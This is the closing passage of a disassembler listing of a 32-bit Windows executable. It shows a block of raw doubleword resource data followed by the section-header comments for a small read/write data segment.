dd 0D2DFAF80h, 0C2BF0CB5h, 1AEBB546h, 0A4BEEAECh, 0CDD77669h
dd 2E16E18Fh, 0BDA7766Ah, 585DAFE1h, 9591868Fh, 6E6C6E71h
dd 1400DBC9h, 0BAA45004h, 3657AEB1h, 849D8481h, 5F641371h
dd 0D14ABB5h, 8B880051h, 3C65F8FEh, 0DF8C2F62h, 3F3E5854h
dd 0FCE0B8A5h, 0D0DC0753h, 3E3FC6CBh, 0F0827864h, 535C0654h
dd 0B1ADB8B1h, 9F8B2924h, 5458DDCBh, 0E3F72635h, 5446E716h
dd 93A28C85h, 8CFBD95Bh, 405DA137h, 5B989323h, 0EFCD8862h
dd 9526FD81h, 7D621629h, 0F7BB31B3h, 0FF6CA5D1h, 0FD4AA7A7h
dd 0B05A833Ch, 0F069C79Ah, 0F2ABEE51h, 0EEAAB1CDh, 87897C87h
dd 8FFD31D4h, 0C15D2C37h, 7A6EF693h, 0FAF94469h, 6362F7C5h
dd 3A234316h, 40CB7E83h, 861162C7h, 8B056260h, 0A046BB8Dh
dd 0E4EAAE6Ch, 0C79B7F77h, 0A8D9792Ah, 35A5E8D1h, 8884C5F5h
dd 2C6AED8Ah, 0F1C79C7Dh, 0B582D100h, 2DC4E394h, 0E6BF7C18h
dd 95D03F48h, 7879A0D5h, 0B4E237A1h, 5D09489Fh, 0E78FE001h
dd 71C5A6ADh, 30E468ACh, 0CBCA2726h, 716BC543h, 0A0A99CE7h
dd 6561203h, 904992CDh, 0EAD5DDDDh, 4073DFC2h, 0F99BE187h
dd 660F0C14h, 2836F9CEh
dd 66EF2D7Eh, 0B3B668D7h, 85E27B01h, 2DF16758h, 787C5038h
dd 0D2E8B3C5h, 1B1AE8F5h, 3E9A8E04h, 7E1B8C8Ch, 9DC08E9Fh
dd 50958C1h, 20379052h, 4FC62425h, 0CBCD816Fh, 0C9C9B7DAh
dd 875F1Fh, 5C944747h, 2AFAC9F9h, 0C4327575h, 565A0F0Ah
dd 4E6896Fh, 9376C3C5h, 1C20D277h, 4C48957Eh, 5831A0FFh
dd 1E294F51h, 8780FC38h, 0DD15533Ah, 68701529h, 49D8093Bh
dd 7A98F251h, 938DEAECh, 541E4930h, 8AA05353h, 0CBC81405h
dd 790FFF18h, 951CE9BDh, 8D024F51h, 0B1698BE7h, 87E8A144h
dd 0B8B986CFh, 5EA4F1F3h, 320D4C1Fh, 0FE7AC2C5h, 0E3DE2BC5h
dd 4E1BD760h, 0B54E78F0h, 60996568h, 0A7A0EDF1h, 3B6D391Ah
dd 0B0529FA2h, 3F44F5ACh, 29EDF37Ch, 0D007D9DCh, 0EABFC94Dh
dd 672D6A86h, 0CE2CD425h, 7EB9B57Dh, 0B61D6CF7h, 0EE017E60h
dd 90964BEFh, 0D7D2B0CAh, 67A6038Ah, 0AAA3C0C3h, 223C72C1h
dd 871A29C5h, 67D2D5D1h, 4C469319h, 858D4E74h, 409C6458h
dd 6FA1CFEDh, 1017C86Dh, 12D0E3D0h, 0C0BA672Fh, 7FDDFB93h
dd 1F9FA2DFh, 0CAE441F0h, 7327A9ADh, 0CBC0E0AFh, 91DC2B7Eh
dd 9F74E556h, 585FE9A3h, 0FD59BAEBh, 0D75399AFh, 0C95C878Ah
dd 565D7463h, 0F7DBB0A3h, 0F0293F3Ah, 0A9DF2564h, 4A041F86h
dd 3C85B9D4h, 1E163CEFh, 0A7380CD1h, 0CFC7141Ah, 0D378D62Bh
dd 45321641h, 29125F54h, 0E1829DE5h, 0F2B9C946h, 0E04CEBACh
dd 40C54A75h, 41E54FBh, 95D4E2E7h, 36AF0F51h, 4CECD06Ah
dd 8ED29245h, 0F3E3B0Ah, 0A7A1EEC2h, 0EEF6C3DFh, 59C7403Bh
dd 1DDB181Dh, 7B68FC00h, 0AB1906FEh, 0E2155257h, 0B6560745h
dd 0E56BBE39h, 0DA4FAC91h, 8F88169Fh, 42733F72h, 963C29DBh
dd 6F20F74h, 5277CD39h, 0CD71EE15h, 0CC2D4A4Dh, 0ACBE2F73h
dd 0FB4BC64Fh, 92668399h, 0E5FF1F95h, 0ABC7D388h, 0A790C1ACh
dd 200EF3D9h, 0BA71BEF3h, 0E1DA27C4h, 4B29CD94h, 9946157Ch
dd 0EC4C6156h, 0FDF908C0h, 68E5022Dh, 9ECD5860h, 7FB8F4F6h
dd 173515F4h, 80B516DAh, 8DF11443h, 1DDBC1B7h, 0B8AF1C30h
dd 0DA4C6A09h, 646B1E21h, 58154F3Bh, 849A4D4Bh, 2B31E4CDh
dd 10C8AAE6h, 0B4ABBA88h, 0F0870E1h, 0DD98DDC2h, 9526D9D4h
dd 6D0604AAh, 4D1F7ACCh, 9013504Bh, 51DC09Eh, 9FE6370Dh
dd 5525CCBAh, 36B6FC08h, 741F06B4h, 26122B89h, 74F00D6Eh
dd 5ED8AE6Eh, 94FD304Fh, 0F7A87B0Eh, 679B08E0h, 7D14B6B2h
dd 0A9B4E4Ah, 0D3B9A2DDh, 8DDD8386h, 0A59EC457h, 0E17BC58h
dd 57ADBCC1h, 0DFE89D2Ah, 4BA98E92h, 73A9F6FBh, 4E9F5F40h
dd 0ADB7CBE9h, 97E3C8B5h, 54A4F987h, 37B50207h, 782E4F3Bh
dd 6307C953h, 0F6DF17F6h, 0A0B6A241h, 0C3036FEDh, 150Dh dup(0)
dd 7Ch dup(?)
_rsrc ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 421000h
align 2000h
_idata2 ends
end start